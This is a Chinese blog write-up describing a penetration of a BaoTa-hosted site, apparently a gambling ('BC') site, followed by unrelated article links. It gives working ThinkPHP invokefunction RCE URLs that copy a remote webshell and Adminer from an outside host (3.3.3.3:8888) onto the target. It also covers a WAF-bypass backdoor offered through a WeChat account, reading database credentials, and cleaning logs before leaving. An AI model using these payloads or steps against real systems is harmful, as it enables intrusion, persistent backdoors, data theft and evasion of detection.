宝塔下的BC实战渗透
宝塔简介
宝塔面板是一款使用方便、功能强大、交互友好且终身免费的服务器管理软件。
集成一键配置:LAMP/LNMP/Tomcat/Node.js、网站、数据库、FTP、SSL,一键部署源码,通过Web端轻松管理服务器。
2分钟安装好面板,一键管理服务器。
服务器安装了宝塔面板可以在上面搭建网站,其实和云帮手,护卫神、WDCP都感觉差不多吧,都是作为这几年比较流行的面板,很多站长基本第一次操作linux面板就是这个。
服务器大多数是用windows系统或Linux系统,安装了Linux系统的服务器不是图形化界面,操作比较复杂,要输入命令,通过命令来执行操作,费时费力,但宝塔面板有Linux系统面板,可以安装LNMP、LAMP等环境,包括简单的备份、监控、定时计划,功能强大,用户使用反馈单机版的问题都有,但是没有针对新的SEO需求,做插件和功能调整。
测试过程
通过目录扫描发现 index.php
访问之,发现存在报错,并泄露相关CMS信息
尝试Thinkphp常规操作进行getshell
访问shell,发现phpinfo解析异常
通过信息搜集发现目标使用宝塔搭建的,怀疑是宝塔的waf过滤了尖括号
通过测试发现call_user_func_array
函数可显示phpinfo但被限制了很多命令执行的函数,需要进行绕过一下
通过dnslog
尝试发现正常出网
http://小生观察室/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://123.dnslog.cn/123.txt&vars[1][]=123.php
随即考虑远程插入宝塔变形后门文件,获取变形后门源代码可在公众号回复bypass_bt后门源代码
即可!
http://小生观察室/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://3.3.3.3:8888/a_bx.php&vars[1][]=bypass.php
插入成功,虽然提示函数不推荐使用,但不影响我们正常访问权限
其他说明
如果上面的方式无法插入后门文件可能是因为目录结构的问题可以尝试添加到upload
目录或者添加.
进行上级目录跳转
https://小生观察室/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://3.3.3.3:8888/adminer.php&vars[1][]=./upload/adminer.php
通过查看源代码,发现确实宝塔干掉了
随即查找数据库配置文件进行连接,默认路径在:application/database.php
发现配置文件存在阿里云OSS
尝试通过行云管家连接ECS服务器,发现失败
最后对相关内容进行取证并打包源代码,清理记录走
相关文章
- 在 Go 里用 CGO?这 7 个问题你要关注!
- 9款优秀的去中心化通讯软件 Matrix 的客户端
- 求职数据分析,项目经验该怎么写
- 在OKR中,我看到了数据驱动业务的未来
- 火山引擎云原生大数据在金融行业的实践
- OpenHarmony富设备移植指南(二)—从postmarketOS获取移植资源
- 《数据成熟度指数》报告:64%的企业领袖认为大多数员工“不懂数据”
- OpenHarmony 小型系统兼容性测试指南
- 肯睿中国(Cloudera):2023年企业数字战略三大趋势预测
- 适用于 Linux 的十大命令行游戏
- GNOME 截图工具的新旧截图方式
- System76 即将推出的 COSMIC 桌面正在酝酿大变化
- 2GB 内存 8GB 存储即可流畅运行,Windows 11 极致精简版系统 Tiny11 发布
- 迎接 ecode:一个即将推出的具有全新图形用户界面框架的现代、轻量级代码编辑器
- loongarch架构介绍(三)—地址翻译
- Go 语言怎么解决编译器错误“err is shadowed during return”?
- 敏捷:可能被开发人员遗忘的部分
- Denodo预测2023年数据管理和分析的未来
- 利用数据推动可持续发展
- 在 Vue3 中实现 React 原生 Hooks(useState、useEffect),深入理解 React Hooks 的